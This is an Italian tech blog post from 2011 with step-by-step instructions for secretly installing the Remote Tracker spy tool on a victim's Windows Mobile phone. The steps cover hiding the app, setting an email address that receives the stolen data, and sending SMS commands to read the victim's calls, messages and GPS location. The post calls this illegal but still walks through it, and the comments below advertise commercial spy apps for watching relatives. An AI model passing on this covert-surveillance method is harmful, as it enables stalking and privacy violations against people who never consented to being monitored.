Headlines News :

Come mettere sotto controllo un cellulare

Written By TexBlogger on 02 maggio 2011 | 08:01

Cellulari: siamo spiati anche da persone che non ci aspettiamo...


Ebbene si! In modo discreto, per così dire "invisibile", c'è chi a nostra completa insaputa controlla le nostre telefonate, i nostri SMS e anche i nostri spostamenti. Sembra una cosa assurda ma è vero, vediamo in che modo lo possono fare. Dunque, a quanto pare neppure i telefonini sono esenti da attenzioni particolari di curiosi, anche se va aggiunto che spiare un cellulare è un'attività illecita, non è difficile trovare su Internet dei tool che una volta installati sul dispositivo mobile della vittima, possono recuperare praticamente tutto, dalle chiamate effettuate, leggere gli SMS inviati e ricevuti e addirittura tracciare i loro spostamenti tramite il localizzatore GPS. E tutto questo senza che il malcapitato se ne renda assolutamente conto.
Vediamo una tecnica adottata per spiare i dispositivi di Windows Mobile, usando un tool (Remote Tracker) che deve essere installato sul telefonino della vittima, in seguito inviandogli un SMS col comando giusto, praticamente si riuscirà a spiare telefonate e messaggi.

  1. Estrarre l'archivio Remotetracker.zip e trasferire il file RemoteTracker.CAB sul telefono della vittima per poi installarlo. Per funzionare questo programma necessità del NET Compact Framework 3.5.
  2. Eseguita  questa operazione, premere sullo smartphone la voce Programmi/Config. In seguito selezionare Menu/Options/Languages/Italiano. Nei menu successivi andiamo ad impostare: in Password la chiave segreta che consentirà di controllare da remoto il tool. In Configurazione email si dovrà inserire l'indirizzo a cui inviare le informazioni.
  3. Ed ecco il controllo di nascosto. In Configurazione GPS andare a scegliere il tipo di GPS. Nel menu Nascondi Remote Tracker andare a confermare con SI per rendere invisibile l'applicazione. Arrivati a questo punto dobbiamo però renderci conto di una cosa: il malcapitato padrone del telefono non si accorgerà di essere spiato. Questa procedura una volta attivata la funzione NON si può più tornare indietro! Ripeto un concetto; spiare un cellulare rappresenta un'attività illecita!
  4. Proseguiamo; in CellID da Coordinate Provider scegliere il provider e premere Applica le Configurazioni. Per controllare lo smartphone, inviare un SMS con un tipo di comando come questo: rt#[comando]#[numero di cellulare o indirizzo email]#[password], dove la password impostata è quella del passo 2.
software

Share this article :

2 commenti:

  1. come spiare un cellulare, è facile con mobile spy: http://www.spiarecellulare.com/come-spiare-un-cellulare.html

    RispondiElimina
  2. Per la loro sicurezza, sorvegliate i parenti grazie al software spia per cellulare Spybubble: http://spybubble.it

    RispondiElimina

Related Posts Plugin for WordPress, Blogger...
Ricerca personalizzata

Sottoscrivi Feed e Twitter

Subscribe via RSS Feed If you enjoyed this article just click here, or subscribe to receive more great content just like it.

Web Life Online su Facebook

Seguici su Google +

Categorie - Archivio Blog

ADSL (45) Android (516) App (538) Blog (35) calcio in streaming (58) cellulari (65) computer (371) Cydia (68) Download (328) eMule (61) Google (174) guida (615) Internet (843) iPhone (413) Jailbreak (41) mappe (71) mIRC (47) Navigatore (46) pirati (134) prodotti (101) programma (351) Router (74) Sistema (154) smartphone (351) Software (407) streaming (226) tecnologia (153) trucchi (647) Video Tutorial (83) windows (328)

L'Angolo del Libro

Guida ottimizzazione Ufficiale Google
di: GOOGLE
LeggI o Scarica

News dai migliori Siti Italiani

 
Support : Creating Website | Johny Template | Mas Template
Proudly powered by Blogger
Copyright © 2009-2014. WEB LIFE ONLINE - All Rights Reserved
Template Design by Creating Website Published by Mas Template